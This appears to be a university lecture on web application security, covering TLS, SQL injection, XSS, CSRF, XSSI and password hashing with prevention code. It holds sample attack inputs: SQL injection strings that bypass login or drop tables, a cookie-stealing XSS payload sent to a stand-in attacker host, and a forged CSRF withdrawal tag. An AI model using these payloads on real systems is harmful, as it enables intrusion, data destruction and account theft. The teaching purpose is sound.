Web Application Development Instructor: Matthew Schurr.

Ethics Preface  Performing any of the attacks mentioned in this lecture against any online service is ILLEGAL.  Use this knowledge to create better applications and test your own applications for bugs.

Security Goals  Confidentiality Prevent an unauthorized read of application data  Integrity Prevent an unauthorized write to application data Ensure application data remains in a consistent state ○ Recall: SQL Transactions + Money Transfers  Availability Prevent unauthorized destruction of data Prevent application downtime and crashes

Threat Modeling  Focuses on understanding potential attackers  Means What knowledge, tools, and resources do attackers have?  Motive What does an attacker stand to gain by compromising your application?  Opportunity What are the possible (feasible) attack vectors against your application?

Common Attacker Types  Script Kiddie Knows how to use tools others have written Little technical understanding No programming knowledge  Individuals Smart, educated Willing to invest time and energy Programming capabilities Modest tools Can often get access to expensive equipment

Common Attacker Types  Organizations/Corporations Large amounts of sustained funding More equipment More individuals  Nation States Willing to break laws Able to exert physical force Able to use courts to compel cooperation Insider threats Wire taps

Man-in-the-Middle Attacks  Information sent over HTTP is transmitted in the clear (as plain text) over TCP/IP. Includes passwords, authentication tokens, session tokens, credit card information, financial data, etc.  Anyone in between you and the destination can intercept the transmission and extract sensitive information. The Internet is a series of interconnected routers; usually, there will be a dozen or more in between you and your destination. Each router is a potential point of attack. Wireless packets can be intercepted by nearby users.

HTTP Request Examples Requests can contain sensitive information.
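
As a minimal sketch of what such a request looks like on the wire, the following Python builds the raw text of a form login sent over plain HTTP. The host, the `/login` path, and the field names are hypothetical and chosen only for illustration.

```python
from urllib.parse import urlencode


def build_login_request(host: str, username: str, password: str) -> str:
    """Return the raw text of a form-encoded POST to a hypothetical /login endpoint."""
    body = urlencode({"username": username, "password": password})
    return (
        "POST /login HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
        f"{body}"
    )


# Every router on the path sees exactly this text when HTTP is used.
raw = build_login_request("www.example.com", "alice", "hunter2")
print(raw)
```

The password appears verbatim in the request body, which is what an eavesdropper would read.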

Man-in-the-Middle Attack  [Diagram: an HTTP request travels from your computer through routers on the Internet to the destination server; one router on the path is malicious.]  Resources within the Internet are owned by a variety of organizations across the world.  A malicious router reads your request in plain text as it passes through.

Transport Layer Security (TLS)  Commonly referred to as SSL  Built on top of TCP/IP, encrypts contents of packets Source and destination addresses still unencrypted Doesn’t provide anonymity HTTPS uses TLS… entire HTTP packets are encrypted  Foundation of all security on the Internet Without full message encryption, all of our other security measures fall apart (tokens and passwords are exposed)

TLS Goals  To establish an encrypted connection between two peers that no third party can break Contents of messages unreadable to third parties  Problem: How can an encrypted connection be securely established between two machines when a third party is privy to all communication between them?

Asymmetric (Public Key) Crypto  Server generates a public, private key pair Server publishes the public key (or provides it when asked) Server locally stores the private key IMPORTANT: private key is known only to server and must never be compromised  Mathematical relationship between private and public keys is such that: Private key cannot be re-derived from the public key Content encrypted using the public key can only be decrypted by its associated private key

Key Exchange  Used to establish a shared, private secret between browser and remote server  General Idea (greatly simplified): Browser asks server for its public key. Server sends public key to browser. Browser generates a random number r. Browser encrypts r using the server’s public key. Browser sends the encrypted r to the server. ○ Any third party listening in will be unable to decrypt r because they are not privy to the private key. Server decrypts r using the private key. Browser and server now have a shared secret (random number) r.  Actual Implementation: Elliptic Curve Diffie-Hellman

Example Key Exchange All math occurs in mod P space.
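
A toy sketch of a classic (finite-field) Diffie-Hellman exchange, where all math occurs mod P. The values of `P` and `G` and the function names are assumptions for illustration; the numbers are far too small to be secure, and real TLS deployments use the elliptic-curve variant mentioned earlier.

```python
import secrets

# Toy public parameters (assumed for illustration; not secure sizes).
P = 23  # prime modulus, known to everyone
G = 5   # generator, known to everyone


def dh_keypair(p, g):
    """Pick a random private exponent and derive the public value g^private mod p."""
    private = secrets.randbelow(p - 2) + 1  # in the range 1 .. p-2
    public = pow(g, private, p)
    return private, public


def dh_shared_secret(their_public, my_private, p):
    """Combine the other side's public value with our own private exponent."""
    return pow(their_public, my_private, p)


browser_private, browser_public = dh_keypair(P, G)
server_private, server_public = dh_keypair(P, G)

# Only the public values cross the network; each side computes the secret locally.
browser_secret = dh_shared_secret(server_public, browser_private, P)
server_secret = dh_shared_secret(browser_public, server_private, P)
print(browser_secret == server_secret)
```

Both sides arrive at the same number because (G^a)^b and (G^b)^a are equal mod P, while an observer only sees G^a and G^b.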

Symmetric Encryption  Content is encrypted and decrypted using the same shared key Designed to be incredibly hard to crack Messages look like random bits to observers (no meaning); meaning can only be obtained by using key Modern Implementation: AES (Advanced Encryption Standard) algorithm  Using shared secret r established in key exchange, all future packets encrypted symmetrically with r as the key. No other party knows r and thus cannot decrypt the messages. r is thrown away at the end of the session

Replay and Modification Attacks  Third party can still see encrypted messages going by, but has no idea what their content is.  Can modify the encrypted message (flip bits) blindly… can potentially have bad effect Solution: Hash-Based Message Authentication Code (HMAC), will discuss later  Can record and replay messages e.g. records encrypted message to send $100 from user A to B on a bank website and replays it to transfer more money Solution: Use a counter on messages  TLS protects from both of these attacks. Yay!
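
A minimal sketch of how a message counter and an HMAC tag together catch replayed and modified messages. This is not the actual TLS record format; the packet layout, `seal`, and `Receiver` are hypothetical, and the message is left unencrypted to keep the example short.

```python
import hashlib
import hmac


def seal(key: bytes, counter: int, message: bytes) -> bytes:
    """Prefix an 8-byte counter and append a 32-byte HMAC-SHA256 tag."""
    header = counter.to_bytes(8, "big")
    tag = hmac.new(key, header + message, hashlib.sha256).digest()
    return header + message + tag


class Receiver:
    def __init__(self, key: bytes) -> None:
        self.key = key
        self.next_counter = 0  # the only counter value we will accept next

    def open(self, packet: bytes) -> bytes:
        header, message, tag = packet[:8], packet[8:-32], packet[-32:]
        expected = hmac.new(self.key, header + message, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):
            raise ValueError("message was modified")
        if int.from_bytes(header, "big") != self.next_counter:
            raise ValueError("message was replayed or reordered")
        self.next_counter += 1
        return message


key = b"k" * 32  # stands in for the shared secret from the key exchange
receiver = Receiver(key)
packet = seal(key, 0, b"send $100 from A to B")
print(receiver.open(packet))
```

Sending `packet` a second time fails the counter check, and flipping any bit in it fails the tag check.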

Further Problems  Assuming the crypto is perfect, it is possible to establish an encrypted connection between two parties that no third party can listen in on.  What’s the problem? We have an unbreakable cryptographic connection with someone, but we don’t know who that someone is. Potentially could be speaking with a man-in-the-middle attacker over an encrypted connection (intercepted our request for server’s public key and provided his own). Attacker establishes a second encrypted connection with real destination and acts as a proxy, reading everything in plain text as it passes through his machine.  Key Problem: How can we be sure that we received the true public key from the server we are trying to talk to?

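Compromised Key Exchange
[Diagram: timeline of messages between Bob, Eve (in the middle), and Alice. Eve's public key is E; Alice's public key is A.]
Bob asks: "Alice, what is your public key?" The reply he receives: "Alice's public key is E."
Eve asks: "Alice, what is your public key?" The reply she receives: "Alice's public key is A."
Over time, each connection moves from unencrypted, to asymmetric encrypted, to symmetric encrypted.
Eve can see the password and secret info unencrypted.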

Certificate Authorities  Solution: TLS verifies with a trusted third-party certificate authority that the server you are connecting to is actually operated by the organization claiming to operate it.  Verification uses digital certificate system (X.509 Certificates) which include the public key and various other information (including issuer).  Browser uses third party to verify that public key provided by server is correct. Naturally, this requires that server operators register their public keys with the third party authority (who will generally require some sort of proof of identity and a fee as part of registration process).  CAs sign certificates with their private key. Browser verifies signature offline using CA’s public key, and asks CA over the internet (using encrypted connection) whether the certificate is still valid (may have been revoked).

Certificate Authorities  How do we get the CA’s public key? Can’t just ask… run into same problem we are trying to solve (man-in-the-middle attacks)  Public keys for certificate authorities are well-known and thus hard-coded into your browser and/or operating system. Prevents verification process from being man-in-the-middle attacked as you never have to ask for a public key.

Deeper Problems  Problems: No zone of authority… any CA can issue a certificate for any domain. Multiple certificates can be issued for the same domain (even by different authorities). All are accepted by operating system without question. There are many privately owned CAs spread throughout the world.  What happens if a trusted certificate authority is compromised? Hacker could steal authority’s private key Government could compel authority with a court order to issue a fake certificate

Deeper Problems  Certificate Authorities can issue “fake” certificates that allow government agencies to perform man-in-the-middle attacks that are invisible to end users. Same situation as before… attacker acts as proxy between browser and server. ○ Fake public key for victim website provided by the attacker is confirmed as legitimate by the fake certificate issued by the authority. These attacks have actually happened… been used by governments to identify political dissidents and read their messages on social networks.  Companies may require employees to install a company CA on their machines. Allows man-in-the-middle attacks to be performed on employee SSL connections… no privacy.

Compromised CAs  As of now, we don’t have a solution.  Due to dynamic nature of internet, CAs are necessary. Trust must begin somewhere.  For ultra-high security apps, possible to be sure who we are connecting to by knowing the right public key beforehand (exchange it by some other medium, e.g. hand it to the other user physically on a note card).  Google has hardcoded their real public keys into Chrome… fake certificates for Google websites will be rejected by the Chrome browser.

Preventing Man-in-the-Middle  TLS (HTTPS) is the best option; very easy to add to your app. Configure your server to use HTTPS Update any links in your application to be over HTTPS Set the secure flag on Cookies to true Redirect unencrypted HTTP connections to HTTPS version  Downside: requires a certificate from a certificate authority to function properly... these cost money.  You can create your own certificate for free. However, all modern browsers will show a warning when you attempt to access a website that uses a self-signed certificate. Will likely deter people from using your site (especially if your app involves financial transactions or personal data). Provides no extra security (not verified by a third-party authority; vulnerable to man-in-the-middle). Useful for testing.

Distributed Denial of Service (DDOS)  Goal: To prevent legitimate users from accessing a service  Means: Flooding packets until all server resources (CPU, Memory, or Bandwidth) are consumed and unavailable to legitimate users Attack is distributed across a large number of origin machines with different IP addresses  Issues: Cheap and easy to launch, tough to stop… incredibly effective at censoring smaller sites. Little technical knowledge required. Outcome is determined largely by who has superior bandwidth capacity Hard to identify and prosecute perpetrators

Distributed Denial of Service  Attacker Tools: Botnets (collection of computers created by malware and centrally controlled by an operator who can execute arbitrary code on infected machines) Anonymous’ Low Orbit Ion Cannon  Mitigation Filters and firewalls ○ Effective against naïve attacks ○ Harder when attacker distributes across large number of IPs and tries to make DDOS traffic appear like legitimate traffic Industry Solution: Throw money at it! ○ Outscale your attacker by adding more application server nodes until they get bored and give up.

SQL Injection  SQL Injection is a technique used to attack data-driven applications. Targets all applications backed by a database system that uses a high-level query language (e.g. SQL).  The technique takes advantage of the fact that fragments of database queries often include user input. SQL queries are simply strings. When these strings include user input, they are a template string concatenated with the user’s input.

SQL Injection  What happens when we concatenate a user’s input with our SQL query, and the user’s input contains symbols that have significance in SQL?  Is it possible for the user (through their input) to modify the query?  The answer is YES.  Let’s look at some examples.

SQL Injection
We have a login system with two fields: username and password.
When a user attempts to log in, we execute:
    $q = sprintf("SELECT * FROM `users` WHERE `username` = '%s' AND `password` = '%s';", $username, $password);
If we get a result, we assume the username/password is correct (the presence of a record indicates that a record existed with that username and password).
What is the problem?

SQL Injection
Let’s say our user enters the following in the username field on the login page:
    Admin'; /*
The concatenated query now reads:
    SELECT * FROM `users` WHERE `username` = 'Admin'; /*' AND `password` = 'input_passwd';
What will happen when this query is executed? Attacker can log in as any user without a password.
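
A small runnable sketch of the same login bypass, using Python's built-in `sqlite3` module and an in-memory database. The table contents and the function name `vulnerable_login` are hypothetical. The sketch assumes SQLite, so the injected input uses a `--` line comment in place of the `; /*` shown above; the effect on the password check is the same.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('Admin', 'correct horse')")


def vulnerable_login(username: str, password: str) -> bool:
    # Mirrors the sprintf approach: user input is pasted straight into the SQL string.
    query = (
        "SELECT * FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    return conn.execute(query).fetchone() is not None


# An honest wrong password is rejected...
print(vulnerable_login("Admin", "wrong guess"))
# ...but a username that closes the quote and comments out the rest is accepted.
print(vulnerable_login("Admin' --", "anything"))
```

In the second call the executed query ends at `username = 'Admin'`, because everything after `--` is treated as a comment.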

SQL Injection
In addition to changing the logic in our application, an attacker can execute any SQL statement.
Username Field:
    asdf'; DROP TABLE `users`; /*
Concatenated Query:
    SELECT * FROM `users` WHERE `username` = 'asdf'; DROP TABLE `users`; /*' AND `password` = 'input_passwd';
Attacker can modify the database arbitrarily! Plus, depending on the database software, it may actually be possible for them to execute arbitrary code on the host machine.

SQL Injection Limitations  Attackers are limited by the information available to them. Unless you are using a well-known open source system, the attackers do not know the database schema. They will have to guess at it.  If you do screw up and have an SQL injection vulnerability, it's helpful if your error messages do not reveal any additional information to attackers.

Indirect SQL Injection
Assume all parameters to a query are malicious.
This query is executed by the registration program:
    sprintf("INSERT INTO `users` (`username`, …) VALUES ('%s', …);", $request->post['username'], …);
When a user goes to read their incoming messages, the program executes:
    $username = query("SELECT `username` FROM `users` WHERE …");
    $messages = query("SELECT * FROM `messages` WHERE `user` = '$username';");
What happens if a user registers an account containing SQL keywords, and then views the messages page?
    lol'; DROP TABLE `messages`;

Preventing SQL Injection  It is very easy to protect your application against SQL injection.  Prepared Statements Separate statement templates from their parameters Immune from SQL injection as long as the template is not derived from external input Parameter values are transmitted later using a different protocol.  If you have followed directions in class, your app is safe.

Prepared Statement Example
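
A minimal sketch of a parameterized query using Python's built-in `sqlite3` module, not the course framework's API. The table and the `login` function are hypothetical. The query template contains only `?` placeholders, and the user's values are passed separately, so they are never parsed as SQL.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
# Plain-text password only to keep the demo short; real apps store a salted hash.
conn.execute("INSERT INTO users VALUES (?, ?)", ("Admin", "correct horse"))


def login(username: str, password: str) -> bool:
    # The template is a constant string; parameters travel alongside it.
    row = conn.execute(
        "SELECT 1 FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


print(login("Admin", "correct horse"))
print(login("Admin' --", "anything"))
```

The injected quote and comment marker are now compared literally against the `username` column, so no row matches.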

XSS  XSS = Cross-Site Scripting  Occurs when you allow an attacker to inject HTML markup into your application (that can be displayed to other users).  Common Causes: Failure to escape POST or GET parameters Failure to escape strings pulled from database

XSS  What’s the big deal? It’s just HTML.  If you can infect users using HTML, then why can’t any website on the internet infect users?  HTML code created by the provider of any given website is “safe.”  HTML code injected into the website is not. It can be harmful or annoying. Results in the loss of users, trust, and ad revenue

XSS  META Tag / Javascript Redirection The attacker injects HTML tags or Javascript that redirects client browsers to any URL. This could be to inappropriate content or a malicious/phishing website.  External Resources The attacker can inject Java Applets or Flash that attempt to install malware.

XSS  Tracking Attacker can cause you to load external resources on their server, enabling them to record your IP address  Javascript Using script tags, the attacker can inject Javascript code into your browser that accesses your cookies and sends them to his server by appending an image, script, or link tag requesting the URL: www.attackserver.com/collect/?cookies=YOURCOOKIES Bad as cookies contain authentication tokens and session IDs… may give attacker access to victim’s account. If an administrator account is compromised, may compromise other parts of the system.  The attacker is in an excellent position to perform CSRF attacks on your users.

XSS  Forms Can embed HTML forms on your site that submit to an attacker controlled site When user submits form, attacker can record the data received May be used to trick user into sending confidential information to attacker server (e.g. usernames, passwords, credit card info, etc.).

Preventing XSS  It is very simple to protect your application against XSS.  You must escape all data that originates from user input before outputting it.  Do not escape the same input twice!
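
A short sketch of output escaping with Python's standard `html.escape`. The `render_comment` helper and the payload are hypothetical. It also shows why escaping the same input twice is a mistake.

```python
import html


def render_comment(author: str, text: str) -> str:
    """Escape user-supplied strings at the moment they are written into HTML."""
    return "<p><b>{}</b>: {}</p>".format(html.escape(author), html.escape(text))


payload = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'
safe_html = render_comment("mallory", payload)
print(safe_html)

# Escaping twice corrupts legitimate text: the user would see "&amp;" on the page.
once = html.escape("Tom & Jerry")
twice = html.escape(once)
print(once)
print(twice)
```

After escaping, the browser displays the payload as text and does not execute it.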

Cross-Site Request Forgery (CSRF)  Occurs when unauthorized commands are transmitted by a user that the website trusts.  XSS exploits trust user has in a site… CSRF exploits trust site has in a user’s browser.  All resources loaded by your browser are the result of an HTTP request. Request will always come from your IP address Request always contains your user agent and cookies

CSRF Attacks  Problem: no limitation prevents a website running on one domain from requesting a resource on a different domain This is a fundamental part of the way the Internet functions. Leads to some unexpected side effects.  Website at www.google.com may contain an image tag whose source is duncan.rice.edu/test.png.  When you load www.google.com, you will also send a request to duncan.rice.edu/test.png. This request will be issued from your IP address, with your User-Agent, and with your cookies for *.duncan.rice.edu.

CSRF Example
Let’s assume we use a bank website located at bank.ex.com and we are logged in as an authorized user.
The bank allows us to make withdrawals using the following URL over HTTP GET:
    https://bank.ex.com/withdraw?account=Alice&amount=1000000&for=Eve
If we visit a malicious website (malicious.com) with the following image tag, what will happen?
    <img src="https://bank.ex.com/withdraw?account=Alice&amount=1000000&for=Eve">

CSRF Example  The bank will make the withdrawal. We just transferred money to our attacker. Why? As far as the bank website can tell, the request is legitimate – it is originating from our browser, our IP address, our user-agent, with our session cookie and authentication token. The bank website has no way of telling that request originated from an image tag on an external site. Same attack is also possible with other tags that request a URL.  The odds of successfully performing CSRF attacks are low (the victim would need to be logged in as an authorized user on the target site). CSRF can still cause incredible damage and must be prevented.

CSRF: POST Deception  Also possible to perform CSRF attacks on forms that are submitted as POST requests  Malicious site can create a form that posts to the bank website and targets an iframe.  Form pretends to be a form that submits a Tweet, but actually goes to the bank website and triggers a withdrawal. User never sees bank website because form is submitted to the iframe… user is oblivious to what happened. Truly deceptive attacker would also fake the tweet functionality of the form so user thinks that everything went okay (using a Javascript onsubmit event).

CSRF Prevention  Include a CSRF token on all requests (POST or GET) that modify data on the server Token is a long, randomly generated string Token can be stored in a cookie or session variable Included as hidden input or GET parameter  When user performs action that modifies server, check whether or not the provided token matches before performing action. Attacker does not have access to user’s cookies or session so cannot retrieve the token to forge the request.  Framework CSRF API does this; syntax in your lecture notes.

CSRF Token Example  The token is unique to each user and is stored on their session.
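
A minimal sketch of issuing and checking a per-session CSRF token. This is not the course framework's API; the plain `dict` standing in for the session and the function names are assumptions for illustration.

```python
import hmac
import secrets


def issue_csrf_token(session: dict) -> str:
    """Create a long random token, remember it on the session, and return it
    so it can be embedded in a hidden form input."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def is_valid_csrf_token(session: dict, submitted: str) -> bool:
    """Check the token sent with a state-changing request against the session's copy."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    # Constant-time comparison avoids leaking how many characters matched.
    return hmac.compare_digest(expected.encode(), submitted.encode())


session = {}
token = issue_csrf_token(session)
print(is_valid_csrf_token(session, token))
print(is_valid_csrf_token(session, "guessed-by-attacker"))
```

A forged request from another site carries the victim's cookies but not this token, so the check fails and the action is refused.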

XSSI (Cross-Site Script Inclusion)  You operate a website which exposes a JSON API that returns information for the front end. GET /api/secret ==> ["secret", "stuff"]  A malicious site cannot request your JSON using AJAX due to the same-origin policy.  However, a malicious site can include your JSON as a normal script since JSON is syntactically valid Javascript.

XSSI  Why is this a problem? (some) Browsers allow the user to override the native Array and Object constructors. Malicious site can still extract the information, even though it is not wrapped in function call (like in JSONP).  Solution #1: Add a CSRF token.  Solution #2: Add a prefix that makes the JSON invalid Javascript (generates syntax errors). PREFIX: )]}' AJAX requests can strip this prefix before parsing the JSON; inclusions cannot.
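
A sketch of Solution #2 in Python. In a real application the stripping step would run in the front end's AJAX code; Python stands in here so the example is self-contained, and the function names are hypothetical.

```python
import json

XSSI_PREFIX = ")]}'"  # makes the response a syntax error if loaded as a script


def protect(payload) -> str:
    """Server side: serialize the payload and put the prefix in front."""
    return XSSI_PREFIX + json.dumps(payload)


def parse_protected(body: str):
    """Client side: strip the known prefix, then parse the remainder as JSON."""
    if not body.startswith(XSSI_PREFIX):
        raise ValueError("missing XSSI prefix")
    return json.loads(body[len(XSSI_PREFIX):])


response_body = protect(["secret", "stuff"])
print(response_body)
print(parse_protected(response_body))
```

Code that fetches the response as text can remove the prefix; a script inclusion hands the raw body to the Javascript parser, which stops at the syntax error.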

External Assets from Users  If you run a community website (such as a forum) that allows users to post links to external resources (for example, images) you should take precautions to prevent your users from being tracked or falling victim to CSRF requests. Only allow assets to be posted that link to trusted domains.  If a user posts an image located on a domain that is not trusted, you should download the image to your server and replace all references to the image with its location on your server. Since the original URL of the image is not preserved, users will not fall victim to CSRF attacks. Since the image is located on your server, you can be sure that a third party is not tracking your users by recording their IP addresses and/or other information. Google Mail does this with images embedded in emails.

Hash Functions
A hash function takes a single binary input of arbitrary length and returns a “random” fixed-length binary sequence. “random”: flipping one bit in the input should flip about half of the bits in the output
For any given input j, hash(j) is guaranteed to return the same output each time it is run. In this sense, hash(j) is representative of the value of j.
    hash(a) == hash(b) ==> a == b    * true with high prob.
    a == b ==> hash(a) == hash(b)    * always true
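
A short sketch of these properties using SHA-256 from Python's `hashlib`. The choice of SHA-256 and the helper names are assumptions for illustration.

```python
import hashlib


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def differing_bits(a: bytes, b: bytes) -> int:
    """Count how many of the 256 output bits differ between hash(a) and hash(b)."""
    da = int.from_bytes(hashlib.sha256(a).digest(), "big")
    db = int.from_bytes(hashlib.sha256(b).digest(), "big")
    return bin(da ^ db).count("1")


# Fixed-length output: both digests are 64 hex characters (256 bits).
print(len(sha256_hex(b"")), len(sha256_hex(b"x" * 10_000)))

# Deterministic: the same input always gives the same output.
print(sha256_hex(b"hello") == sha256_hex(b"hello"))

# "hello" and "helln" differ in a single input bit ('o' is 0x6f, 'n' is 0x6e);
# the count printed here should land somewhere near half of 256.
print(differing_bits(b"hello", b"helln"))
```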

Hash Functions  It is very difficult to compute an inverse hash function, hash^-1.  This means it is computationally expensive or impossible to recover the original input that created a particular hash. e.g. given hash(j) we cannot determine j  For any inverse hash function hash^-1, we have no guarantee that hash^-1(hash(j)) = j. Why?

Hash Collisions  Since there are an infinite number of inputs to a hash function but only a finite number of outputs, some distinct inputs must produce the same output.  When this happens, a hash collision has occurred. This property is one of the reasons why inverse hash functions are difficult. Note: Cryptographic hash functions are specifically designed to make finding collisions difficult.  k != j && hash(j) == hash(k) ==> collision

Hash Collisions  However, the probability of a hash collision occurring is negligible, especially once we consider that our application will only use a small, finite subset of the infinite number of possible inputs into the hash function. e.g. passwords can only be 6-32 characters in length  Due to this, we can still say that a hash function gives a unique representation of each input value while obfuscating the input value in a way that it cannot be easily recovered. hash(a) == hash(b) ==> a == b * assume always true

Hash Uses  Hashes can represent the value of a piece of data that we do not want to store in plain text and that we do not want to be recoverable. e.g. passwords  Store passwords in the databases as hashes. When a user wants to log in and provides a password, we can hash the password they provide and compare it to the hash stored in the database. If they match, then the password is correct. If they don’t, then it was wrong. We then purge the plaintext password from memory.

Why should we use hashes?  In the event that our database is compromised and dumped, an attacker will not be able to access user accounts. Many users use the same email/username/password across many different sites and services ==> good for users Attackers cannot login to our services without knowing the passwords that generated the hashes (they must provide j such that hash(j) equals the stored hash in the database).  If you have ever used the password recovery feature on a website, most websites only allow you to reset your password – they do not send you your existing password. They cannot recover your existing password; it is hashed. If you ever encounter a website that does send you your password, then that website is doing it wrong.

Improper Usage of Hashes  Why not perform the hashing client side and then send the hash to the server to store?  This is effective against password disclosure, but it does not prevent unauthorized access to user accounts if the database is compromised.  Why? The hash has become a password equivalent. An attacker can just send an HTTP POST request containing the username and hash to our server to log in. Attacker now only needs to know hash(j), not j.

Rainbow Tables  What if someone were to pre-compute a mapping of input values to hashes? Create a table mapping j -> hash(j) for all possible j  You could then invert the mapping. Now you have a map of hash(j) -> j for all j  We call this mapping a Rainbow Table (strictly, a rainbow table is a space-saving variant of this lookup table built from chains of hashes). This table will be different for each hash algorithm.  You can now use the rainbow table as an inverse hash function – you can look up the input that corresponds to any given hash.  This is a very efficient way to “crack” hashes and retrieve the original value. We can generate the table once, and then crack as many hashes as we want.
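
A toy sketch of the precomputed mapping described above, built as a plain dictionary from hash(j) to j for every lowercase string of up to three characters. The alphabet, the length limit, the use of SHA-256, and the function names are assumptions chosen to keep the table small.

```python
import hashlib
from itertools import product
from string import ascii_lowercase


def unsalted_hash(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


def build_lookup_table(max_length: int) -> dict:
    """Map hash(j) -> j for every lowercase string j of length 1..max_length."""
    table = {}
    for length in range(1, max_length + 1):
        for chars in product(ascii_lowercase, repeat=length):
            candidate = "".join(chars)
            table[unsalted_hash(candidate)] = candidate
    return table


# 26 + 26**2 + 26**3 = 18,278 entries, computed once and reused for every hash.
table = build_lookup_table(3)

stolen_hash = unsalted_hash("cat")  # stands in for a hash taken from a dumped database
print(table.get(stolen_hash))
```

The cost of building the table is paid once; each later lookup is a single dictionary access.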

Rainbow Tables  Obviously, it is not feasible to create such a mapping for every possible value of j (recall: the space of j is infinite).  However, it is feasible to create one for every possible value of j containing 10 characters or less. These tables are widely available for download online for popular hash algorithms.  For the purpose of un-hashing user passwords, this would be sufficient in most cases to recover at least some of the passwords (if the system does not enforce complexity constraints).  Does this mean that hash algorithms are not a good way to store information, such as passwords, that we do not want to recover?

Salting  A salt is a random piece of data used as an additional input to a hash function. A new salt is generated each time a password is hashed for storage. In addition to storing the hash in the database, we also store the salt alongside it in plain text. This technique, known as salting, was developed to prevent attacks using rainbow tables.  The salt greatly increases the complexity of the input to the hash function, making it infeasible to create a rainbow table of sufficient length and forcing any brute-force attack to start over for each user.

Salting  Salts are long, random, and unique to each individual user. Rainbow tables now depend on two variables: j, salt  A rainbow table generated for any given salt would only be able to crack hashes that were generated using that salt (in this case, a single user’s password). No longer worth the effort required to generate the tables Rainbow table attacks become infeasible

Salting  In the event that an attacker cracks the password using a rainbow table by finding a hash collision, they still will not be able to log in to that user’s account.  In order to login, they need to recover the string that, when appended to the salt, results in the proper hash. j s.t. hash(j + stored_salt) == stored_hash  The probability of the string that caused the collision appended to the salt resulting in the correct hash is effectively zero.

Salting Algorithm (Pseudocode)
We might use the following algorithm to hash a password for storage:
    salt = random_bytes(128);
    hashed = hash(input_password + salt);
    user.store_password(hashed, salt);
    zero_memory_bytes(input_password);
When a user attempts to log in and we want to check a password:
    hashed, salt = user.get_password()
    if (hash(input_password + salt) == hashed)
        session.set_current_user(user)   // Login success
    else
        display_login_failed()           // Wrong password
    zero_memory_bytes(input_password);
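
A runnable Python sketch of the same store-and-check flow. It assumes SHA-256 as the hash and uses hypothetical function names. The memory-zeroing step is omitted because Python strings are immutable and cannot be reliably wiped. A fast hash is used only to mirror the pseudocode; a deliberately slow algorithm is the better choice for real passwords.

```python
import hashlib
import hmac
import os

SALT_BYTES = 128  # same salt length as the pseudocode


def hash_password(password: str):
    """Return (digest, salt) to store in the user's database record."""
    salt = os.urandom(SALT_BYTES)
    digest = hashlib.sha256(password.encode() + salt).digest()
    return digest, salt


def check_password(password: str, stored_digest: bytes, salt: bytes) -> bool:
    """Re-hash the submitted password with the stored salt and compare."""
    candidate = hashlib.sha256(password.encode() + salt).digest()
    return hmac.compare_digest(candidate, stored_digest)


stored_digest, stored_salt = hash_password("correct horse")
print(check_password("correct horse", stored_digest, stored_salt))
print(check_password("wrong guess", stored_digest, stored_salt))
```

Because each call draws a fresh salt, two users with the same password end up with different stored hashes.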

Hash Algorithms  Each hash algorithm has its own unique properties. These properties make certain algorithms ideal for some tasks and not ideal for others.  Some algorithms are designed to be fast because we do not really care whether or not the original value can be easily recovered. These algorithms are useful when calculating hash table keys (a data structure) or verifying that two files are equivalent by hashing their contents (checksums). In both cases, we do not care if the original value can be easily recovered, and we want to perform the hashing quickly.

Fast Hash Algorithms  Memcached is a key-value store that uses a hash table based on a user-provided key to determine the appropriate slave server to read/write the associated value to/from. If we used a slow hashing algorithm (say that generating a hash took 5 seconds), reads and writes to the data structure would take a minimum of 5 seconds. This access time would defeat the purpose of using memcached; it is supposed to be very fast!  Dictionaries in Python are implemented in a similar way. Consider some of the programs you have written in class. Would it seriously hinder the running time of your programs if Python used a slow hash function?

Hash Algorithms (cont.)  Other hash algorithms are designed to be slow and make the original value difficult to recover. e.g. bcrypt  These algorithms are ideal for storing secrets (such as passwords and authentication tokens). The slow speed makes brute-force attacks harder. We do not want the original values to be easily recoverable.

bcrypt  As computer hardware improves, hash algorithms run faster and faster making them easier to crack via brute force.  Researchers have designed a hash algorithm called bcrypt which takes three inputs: a secret, a salt, and a cost. Output now depends on three variables… brute force and rainbow tables become even less feasible. Store the hash in the database along with plaintext cost and salt.  bcrypt is ideal for storing passwords or secrets Even as computer hardware improves, the amount of time required to generate a hash can be held roughly constant by increasing the cost.  To increase cost: rehash the password using a new cost and a different salt the next time the user enters their password (plain text password available in memory at that time)
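
bcrypt itself is not in Python's standard library, so this sketch swaps in PBKDF2-HMAC-SHA256 from `hashlib`, whose iteration count plays the role of the cost. It illustrates storing the cost next to the hash and upgrading it at login. The record layout, `CURRENT_COST`, and the function names are hypothetical.

```python
import hashlib
import hmac
import os

CURRENT_COST = 100_000  # hypothetical iteration count; raise it as hardware improves


def make_record(password: str, cost: int = CURRENT_COST) -> dict:
    """Hash with a fresh salt and keep the salt and cost in plain text beside it."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, cost)
    return {"hash": digest, "salt": salt, "cost": cost}


def verify_and_upgrade(password: str, record: dict):
    """Return (ok, record). On success, rehash if the stored cost is out of date."""
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), record["salt"], record["cost"]
    )
    if not hmac.compare_digest(candidate, record["hash"]):
        return False, record
    if record["cost"] < CURRENT_COST:
        # The plain-text password is in memory right now, so this is the
        # moment to rehash it with the new cost and a different salt.
        record = make_record(password, CURRENT_COST)
    return True, record


old_record = make_record("correct horse", cost=1_000)  # created under an older, cheaper cost
ok, new_record = verify_and_upgrade("correct horse", old_record)
print(ok, old_record["cost"], new_record["cost"])
```

Records are upgraded lazily, one user at a time, because the server never has the plain-text password except during a login.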

